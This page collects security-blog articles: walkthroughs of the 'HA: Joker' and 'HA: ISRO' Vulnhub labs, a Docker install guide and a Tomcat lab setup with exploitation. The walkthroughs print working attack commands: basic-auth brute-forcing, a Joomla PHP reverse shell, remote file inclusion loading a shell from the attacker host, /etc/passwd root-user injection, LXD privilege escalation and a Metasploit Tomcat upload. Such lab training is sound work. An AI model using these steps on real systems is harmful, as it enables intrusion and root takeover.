HA Joker Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA: Joker” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find Root Flag on the Target Machine.

Penetration Methodologies

Scanning Network
- Netdiscover
- Nmap
Enumeration
- Browsing HTTP Service
- Performing Directory Brute force
- Performing Bruteforce on Joomla
Exploitation
- Exploiting the Joomla
- Getting a reverse connection
- Spawning a TTY Shell
Privilege Escalation
- LXD

Walkthrough

Scanning Network

First of all, we try to identify our target. We did this using the netdiscover command. It came out to be

192.168.1.101

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.101

1	nmap -A 192.168.1.101

Enumeration

With the help of the scan, we now know that port number 22, 80 and 8080 are open with the service of SSH, HTTP respectively. Now that port 80 is open, so we opened the target IP address in our browser as shown in the following image:

http://192.168.1.101

1	http://192.168.1.101

This gave us a collection of Joker Quotes from his appearance over time in the comics and the movies. We also inspected the source code of this webpage, it was also riddled with the commented joker quotes.

As we couldn’t find anything of much use on the webpage hosted on the port 80, we decided to enumerate the service running on the port 8080. This was surprisingly only accessible to an authorized user with proper credentials as shown in the image given below. It’s time to look for these credentials.

http://192.168.1.101:8080

1	http://192.168.1.101:8080

Now while we were busy browsing the webpages, we also started a directory bruteforce scan using the dirb tool. We applied different variants of scans with different extensions. We got success with the .txt extension. We found the secret.txt.

dirb http://192.168.1.101/ -X .txt

1	dirb http://192.168.1.101/ -X .txt

Now that we have found the secret.txt file. It contained a conversation between Batman and our beloved Joker. Here there was a repeat mention of the word ‘rock’ this struck us as ‘rockyou.txt’ the famous bruteforce dictionary. Also, there was a mention of the ‘one of your 100 poor jokes’. It was a bizarre mention of the word 100. So what we accumulated from this was that the password for the panel at port 8080. Must be in the top 100 passwords of the Rockyou dictionary.

wget http://192.168.1.101/secret.txt
cat secret.txt

1 2	wget http://192.168.1.101/secret.txt cat secret.txt

Now that we have formulated a plan to use the top 100 passwords from the rockyou.txt dictionary, it’s time to compile a smaller dictionary of those 100 passwords so as to make the bruteforce faster and lighter. To do this we are going to use the head command. From the head command, we are going to pass the parameter of 100 keywords and direct the output generated by this command in a text file using the greater than (>) symbol.

head -n 100 rockyou.txt > dict.txt

1	head -n 100 rockyou.txt > dict.txt

Now as this is a web application and we are required to perform a brute force, we are going to use the BurpSuite Application. For that, we are going to open the webpage hosted on the port 8080 and enter any random characters in the login panel and press the OK button after applying the burp proxy.

As we started the BurpSuite and clicked on the OK button after applying the proper proxy, and enabling the Intercept option on the BurpSuite, we are able to capture a request that was generated. Further on, we right-clicked on the request captured and selected the option “Send to Intruder”.

After Sending it to Intruder, we are going to check the Intruder tab for the transferred request. Here in the Intruder section, we are going to get into the Positions Tab. Here we select the Attack type to be Sniper. We will select the Authorization hash and Click on the Add Button on the right side.

The base64 encoded value of Authentication is a combination of username and password now the scenario is to generate the same encoded value of authentication with the help of user password dictionary, Therefore, I have made a dictionary which contains both user password names in a text file.

In order to use the dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options.

So we are going to modify the dictionary we created earlier by adding the username as ‘joker’ followed by a ‘:’. So that it might look like:

joker:password

1	joker:password

After applying the above-stated settings, we went back to the Positions Tab and Clicked on the “Start Attack Button”. The Bruteforce starts and gives the result. Here we are going to get a lot of 401 errors. But we will have to find the entry with the 200 code.

As this text is encoded in the Base64 Encryption. We converted it into the Plain Text. Upon conversion, it came out to be:

joker:hannah

1	joker:hannah

We went back to the login panel and entered the username as ‘joker’ and password as ‘hannah’. This was a successful login. And we could see the Joomla Website as shown in the given image.

As this is a Joomla website, its login panel must be at /administrator. So we surfed that URL in our Browser. Here we got stopped by another login panel. After a brief searching over the internet, we found that the default credentials of Joomla are ‘joomla:joomla’. So, before trying anything else, we will be trying these login credentials.

Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the PHP reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below

After we got the shell, we saw that the shell that we got is an improper shell, so we used the python one-liner to convert it into a proper shell. After conversion, we ran the id command. We saw that this shell is of the user ‘www-data’. We saw that this user is a part of the lxd group. This could be our way to root.

python3 -c 'import pty;pty.spawn("/bin/bash")'
id

1 2	python3 -c 'import pty;pty.spawn("/bin/bash")' id

Privilege Escalation

To learn the Lxd privilege escalation in detail, refer to this article: “Lxd Privilege Escalation”.

In order to take escalate the root privilege of the target machine, we will have to create an image for lxd. To that, we will first, Download build-alpine in the attacker machine (Kali Linux) through the git repository. After that, we will be traversing it into the lxd-alpine-builder directory and execute the script “build -alpine” that will build the latest Alpine image as a compressed file.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

Now we will send the tar file to the target machine. We will be using the Python HTTP server for this transfer.

ls
python -m SimpleHTTPServer

1 2	ls python -m SimpleHTTPServer

On the target machine, firstly we will be downloading the alpine image followed by importing an image for lxd. After that, we will be Initializing the image inside a new container.

wget http://192.168.1.107:8000/alpine-v3.10-x86_64-20191019_0712.tar.gz
lxc image import ./alpine-v3.10-x86_64-20191019_0712.tar.gz --alias myimage
lxc image list

wget http://192.168.1.107:8000/alpine-v3.10-x86_64-20191019_0712.tar.gz

lxc image import ./alpine-v3.10-x86_64-20191019_0712.tar.gz --alias myimage

lxc image list

Finally, we will be mounting the container inside the /root directory. Once inside the container, navigate to /mnt/root to see all resources from the target machine. After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag here and we found the final.txt. This concludes this Boot to Root Challenge.

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
cd /mnt/root/root
ls
cat final.txt

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

cd /mnt/root/root

cat final.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: ISRO” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

Scanning Network
- Netdiscover
- Nmap
Enumeration
- Browsing HTTP Service
- Performing Directory Bruteforce
Exploitation
- RFI
- Create PHP reverse shell
- Getting a reverse connection via RFI
- Spawning a TTY Shell
Privilege Escalation
- Writable /etc/passwd File

Walkthrough

Scanning Network

First of all we try to identify our target and for this use the following command:

netdiscover

1	netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.104

1	nmap -A 192.168.1.104

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:

http://192.168.1.104

1	http://192.168.1.104

It opened a webpage as shown in the above image. Here we found the Bhaskara page, so now we opened and found an information webpage there as shown in the image below:

http://192.168.1.104/bhaskara.html

1	http://192.168.1.104/bhaskara.html

As a convention, we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.

Now we got to decode it. To do this we will be using the combination of the echo command and the base64 -d.

echo "L2JoYXNrYXJh" 1 base64 -d

1	echo "L2JoYXNrYXJh" 1 base64 -d

After decoding the base64 encoded text we get “/bhaskara”. This seems a hint that there might be a directory named bhaskara.

So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.

Now in order to crack this file, we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.

python true.py bhaskara > hashes
john hashes --show

1 2	python true.py bhaskara > hashes john hashes --show

Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image.

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’

It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let’s move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.

dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php

1 2	dirb http://192.168.1.104 dirb http://192.168.1.104 -X .php

We went into the /img directory. Here we found an image called aryabhata.jpg.

We will download the aryabhata.jpg and opened it.

Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.

As we couldn’t find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag.

steghide extract -sf aryabhata.jpg
cat flag.txt

1 2	steghide extract -sf aryabhata.jpg cat flag.txt

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in our drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.

192.168.1.104/connect.php?file=/etc/passwd

1	192.168.1.104/connect.php?file=/etc/passwd

We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one-liner showed below.

nano shell.php
python -m SimpleHTTPServer

1 2	nano shell.php python -m SimpleHTTPServer

We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.

nc -lvp 1234

1	nc -lvp 1234

After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.

192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php

1	192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php

Upon execution, the shell gave us a session to the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

1	python3 -c 'import pty;pty.spawn("/bin/bash")'

We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.

netstat -antp

1	netstat -antp

We tried to login in the MySQL database as the root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.

mysql -u root 
show databases;
use flag;
show tables;
select * from flag;

mysql -u root

show databases;

use flag;

show tables;

select * from flag;

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.

ls -la /etc/passwd

1	ls -la /etc/passwd

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt user3 pass123

1	openssl passwd -1 -salt user3 pass123

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.

echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt

echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd

tail /etc/passwd

su raj

Password: pass123

cd /root

cat final.txt

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

Docker Installation & Configuration

Docker services are extensively used in IT operations, so it is very important that you start learning from docker basics. In this article, we will cover the installation and setup of the docker, along with its specific uses.

Learn web application in

Table of Content

Introduction to docker
Docker and its terminology
Advantages of docker
Installation and usage

Introduction to Docker

Docker is a third-party tool developed to create an isolated environment to execute any application. These applications are run using containers. These containers are unique because they bring together all the dependencies of an application into a single package and deploy it.

Now, to work with docker you will need to install docker-engine in your host. It is a foundation to the docker system, which basically runs as a client-server application. Its daemon process is referred to as server and the command-line interface is referred to as a client and REST API is used to create a communication link between client and server.

In Linux, docker client interacts with docker server through the CLI. Here, the terminal is docker client and docker host will run the docker daemon.

Whereas in windows, to work with docker, we need to install docker toolbox component in docker host in order to set up an environment on your Windows or iOS.

Docker and its terminology

When working with docker, one should be familiar with the following terms :

Docker Hub: It is a repository which available to all who uses docker through cloud. Through docker hub, one can create, store, test, pull and share container images.
Docker Images : Docker image acts as a template in order to create container. Build command is used to create docker images. Docker images makes it easy.
Docker containers : Containers are said to be isolated environment provided to the docker image and its dependencies so that it can run independently. The focus of deploying a container is to update or repair an application or just simply modify it and share it. When working on an image, container lets you create a layer of a single command used which make it easy to modify it, or upgrade or degrade is version.
Docker Registry : All the docker images are stored in docker registry. User can either can have local registry on their system or they can have a public one like docker hub.

Advantages of docker

Easy to use
Faster scaling systems
Better software delivery
Flexibility
Provides isolated environment
Supports software-defined networking
Rapid deployment
Security

Installation and usage

To install docker, simply open the terminal of Linux and type the following command :

apt install docker.io

1	apt install docker.io

To check the version one can use the following command :

docker --version

1	docker --version

Further, you can run help command in docker, which is as follows, to know all the options that docker provides at your service.

docker --help

1	docker --help

Once the docker is up and running, you can run or pull any image in your docker container. For instance, here we have run hello-world. When you run the following command, it will first check your local repository; if the image is not available there then it will pull it from docker hub.

docker run hello-world

1	docker run hello-world

As we have explained before, CLI works as a client, so directly from the terminal, you can search for any image you like. Like, here we have searched for ubuntu. One thing to remember here is that image with more stars will be the most authentic one.

docker search ubuntu

1	docker search ubuntu

Once you find your image, you can pull it into your container with the following command :

docker pull ubuntu

1	docker pull ubuntu

Now to check how many images you have in your docker, simply type the following command :

docker images

1	docker images

To remove any image, use the following command :

docker rmi hello-world

1	docker rmi hello-world

Here, rmi refers to remove image.

Now, in the details given by ps command, you can see that the name of our ubuntu image is adoring curie, which is a random name generated by docker for every image. To, rename this name we can use the following command :

docker run -it -d ubuntu
docker run -it -d --name "ignite" ubuntu
docker ps

docker run -it -d ubuntu

docker run -it -d --name "ignite" ubuntu

docker ps

And you can confirm with the ps command again that the name has been changed as shown in the image below :

The docker attaches command permits you to attach to a running container using the container ID or name, you can use one instance of shell only though attach command. But if you crave to open new terminal with new instance of container’s shell, we just need run docker exec.

docker attach ignite
docker exec -i -ignite /bin/bash

1 2	docker attach ignite docker exec -i -ignite /bin/bash

Using the ps command we can see all the processes that are running in docker. There, for this, type :

docker ps
docker ps -a

1 2	docker ps docker ps -a

To stop the running container, you can use stop command as shown in the below image, we have stopped the container and its process which can be confirm with the help of process command. As result there should be no running process for ignite.

docker stop <docker-container >
docker rm ignite
docker ps -a

docker stop <docker-container >

docker rm ignite

docker ps -a

If you can export the docker filesystem as a archive, use export command to compress the filesystem of a docker container into tar. The export commands fetch the whole container like a snapshot of a regular VM.

docker export <container ID> | gzip > {path for tar} filename.gz

1	docker export <container ID> \| gzip > {path for tar} filename.gz

docker export <container name> | gzip > {path for tar} filename.tar

1	docker export <container name> \| gzip > {path for tar} filename.tar

It will give you a flat .tar archive containing the filesystem of your container.

When you will export container as tar file, the file has hash value which can read as:

cat {path of exported tar file} |docker import – newignitelab

1	cat {path of exported tar file} \|docker import – newignitelab

In order to save the image of container which you can upload on other docker use save command. You can subsequently load this “saved” images into a new docker instance and create containers from these images.

docker save <container name> | gzip > {path for tar} filename.tar
docker load -i /home/raj/docker/igniteimage.tar

1 2	docker save <container name> \| gzip > {path for tar} filename.tar docker load -i /home/raj/docker/igniteimage.tar

In order to clear all image and or stop all process of the container. It will pack the layers and metadata of all the chain required to build the image.

docker rm -f $(docker ps -aq)

1	docker rm -f $(docker ps -aq)

To learn how to set up vulnerable web application setup using docker from here.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Apache Tomcat Penetration Testing Lab Setup

In this article, we will learn the process of installing an Apache Tomcat on any Linux Machine. We will also learn how to gain control over our victim’s PC through exploiting Apache Tomcat.

Requirements:

Server/Victim Machine: Ubuntu 18.04

Pentesting Machine: Kali Linux

Table of Content

Introduction of Apache Tomcat

Installation of Apache Tomcat

Install Apache
Install Java JDK
Download tomcat manager
Tomcat manager configuration
Create a tomcat user and group
Assign permission
Create a systemd Service File
Update firewall to allow tomcat
Configure Tomcat Web Management Interface
Access the Web Interface

Exploiting Apache Tomcat

Introduction of Apache Tomcat

Apache Tomcat which is also known as Tomcat Server is a Java-Based HTTP Web Server. It implements Java EE Specifications like Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket. It is an open-source software made by developers at Apache Software Foundation. Apache has been released as early as 1999. That makes Apache Tomcat 20 years old at the time of publication of this article.

Apache Tomcat in its simplest configuration runs in a single operating system process. This process is commonly known as the Java virtual machine (JVM). This allows Apache Tomcat platform-independent as well as secure as compared to others.

Installation of Apache Tomcat

Let’s start with apache tomcat installation but before that, you should go with below command.

apt update
apt install apache2

1 2	apt update apt install apache2

Now, Apache Tomcat needs Java to be installed so that the Java Application code can be executed on the server. To make this possible, installed the Java Development Kit.

apt-get install default-jdk

1	apt-get install default-jdk

Create User and Group

To run the tomcat as an unprivileged user, create a group and a new user named as tomcat. We have created the user in /opt because we are going to install tomcat in that directory. We don’t need the tomcat user to use the shell so we will be using the -s parameter to set /bin/false shell. By doing this authentication will get disabled for the tomcat user.

groupadd tomcat
cd opt
mkdir tomcat
useradd -s /bin/false -g tomcat -d /opt/tomcat tomcat

groupadd tomcat

cd opt

mkdir tomcat

useradd -s /bin/false -g tomcat -d /opt/tomcat tomcat

Download Tomcat Manager

Now, we are going to download the apache tomcat Package from here. After downloading it’s time to extract the package it inside /opt directory and move forward.

sudo tar xzvf apache-tomcat-9.0.24.tar.gz -C /opt/tomcat --strip-components=1

1	sudo tar xzvf apache-tomcat-9.0.24.tar.gz -C /opt/tomcat --strip-components=1

Assign Permissions

Now we are going to use the chgrp command to give the ownership of the tomcat directory to the tomcat group.

cd /opt/tomcatchgrp -R tomcat /opt/tomcat

1	cd /opt/tomcatchgrp -R tomcat /opt/tomcat

To allow the tomcat group user to perform the read and execute operation change permission for /conf file as given below.

chmod -R g+r confchmod g+x conf

1	chmod -R g+r confchmod g+x conf

Also give ownership to the tomcat group user for directories like webapp/, work/, temp/ and logs/.

chown -R tomcat webapps/ work/ temp/ logs/

1	chown -R tomcat webapps/ work/ temp/ logs/

We want Apache Tomcat to be run as a service and for that, we will have to set up a system service. To do this, we are going to require the location of the Java Installation. For this, we will be running the command given below.

update-java-alternatives -l

1	update-java-alternatives -l

Create an SYSTEMD Service File

To create a system service file, open the tomcat. service file in the /etc/systemd/system directory using nano editor.

nano /etc/systemd/system/tomcat.service

1	nano /etc/systemd/system/tomcat.service

Now append the following content and modify the JAVA_HOME as shown below

 [Unit]
Description=Apache Tomcat Web Application Container
After=network.target

[Service]
Type=forking

Environment=JAVA_HOME=/usr/lib/jvm/java-1.11.0-openjdk-amd64
Environment=CATALINA_PID=/opt/tomcat/temp/tomcat.pid
Environment=CATALINA_HOME=/opt/tomcat
Environment=CATALINA_BASE=/opt/tomcat
Environment='CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC'
Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom'

ExecStart=/opt/tomcat/bin/startup.sh
ExecStop=/opt/tomcat/bin/shutdown.sh

User=tomcat
Group=tomcat
UMask=0007
RestartSec=10
Restart=always

[Install]
WantedBy=multi-user.target

[Unit]

Description=Apache Tomcat Web Application Container

After=network.target

[Service]

Type=forking

Environment=JAVA_HOME=/usr/lib/jvm/java-1.11.0-openjdk-amd64

Environment=CATALINA_PID=/opt/tomcat/temp/tomcat.pid

Environment=CATALINA_HOME=/opt/tomcat

Environment=CATALINA_BASE=/opt/tomcat

Environment='CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC'

Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom'

ExecStart=/opt/tomcat/bin/startup.sh

ExecStop=/opt/tomcat/bin/shutdown.sh

User=tomcat

Group=tomcat

UMask=0007

RestartSec=10

Restart=always

[Install]

WantedBy=multi-user.target

Now Save this file. This will make tomcat a service.

Reload the systemd daemon to register our newly created tomcat service. If everything is done correctly, we will able to run, stop and see the status of the Apache Tomcat as a service.

sudo systemctl daemon-reload
sudo systemctl start tomcat
sudo systemctl status tomcat

sudo systemctl daemon-reload

sudo systemctl start tomcat

sudo systemctl status tomcat

Update Firewall to Allow Tomcat

It’s time to allow the tomcat via our firewall Since Ubuntu has the ufw installed and set up by default. Apache Tomcat generally uses the post 8080 to receive requests from users.

sudo ufw allow 8080

1	sudo ufw allow 8080

Execute below command to start tomcat starts automatically whenever the machine boots up.

sudo systemctl enable tomcat

1	sudo systemctl enable tomcat

Configure Tomcat Web Management Interface

At this stage, if you will browse the Server IP with the port 8080, you will be greeted with an Apache Tomcat Page. But if you will click on the links to the Manager App, you will get Access Denied. This means that you haven’t yet set up the Tomcat Web Manager Interface. So, let’s do that and complete the Apache Tomcat Setup.

Open the file using the nano editor and make the following changes as shown in the image given below.

sudo nano /opt/tomcat/conf/tomcat-users.xml
<user username="admin" password="password" roles="manager-gui,admin-gui"/>

1 2	sudo nano /opt/tomcat/conf/tomcat-users.xml <user username="admin" password="password" roles="manager-gui,admin-gui"/>

You can change the username and password as per your choice. We will save and close the editor after making appropriate changes.

By default, Apache Tomcat restricts access to the Manager and Host Manager apps to connections coming from the server. As we are installing Tomcat for a remote machine, we will probably want to alter this restriction. To change the restrictions on these, we will be editing these context.xml files.

sudo nano /opt/tomcat/webapps/manager/META-INF/context.xml

1	sudo nano /opt/tomcat/webapps/manager/META-INF/context.xml

Inside, comment out the IP address restriction to allow connections from anywhere. Alternatively, if you would like to allow access only to connections coming from your own IP address.

sudo nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

1	sudo nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

We do the same thing with the host-manager file. To allow access to Host Manager too.

saved the changes restart the tomcat service.

systemctl restart tomcat

1	systemctl restart tomcat

Access the Web Interface

We got to the interface by entering your server’s domain name or IP address followed on port 8080 in our browser. Now we will try to see if the Manager and Host Manager interfaces are working. Click the Buttons highlighted in the image.

The Login authentication page will pop-up as expected, we enter the credentials that we created earlier.

Upon verification of the credentials, Apache Tomcat lands us to this Tomcat Virtual Host Manager Interface. From this page, you can add virtual hosts to serve your applications. This concludes our Apache Tomcat Setup.

Exploiting Apache Tomcat

Now that we have successfully installed the Apache Tomcat Framework, Let’s do its Penetration Testing. We are going to use Metasploit for exploiting the Apache Tomcat.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > set target 2
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.0.23
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpUsername admin
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword password
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

use exploit/multi/http/tomcat_mgr_upload

msf5 exploit(multi/http/tomcat_mgr_upload) > set target 2

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.0.23

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf5 exploit(multi/http/tomcat_mgr_upload) > set httpUsername admin

msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword password

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

As a result, you can observe that we have the meterpreter session of the target machine.

meterpreter > shell
id

1 2	meterpreter > shell id

Learn multiple ways to exploit tomcat manager from here.

Author: Ahmad is a Technical Writer, Researcher and Penetration Tester. Contact here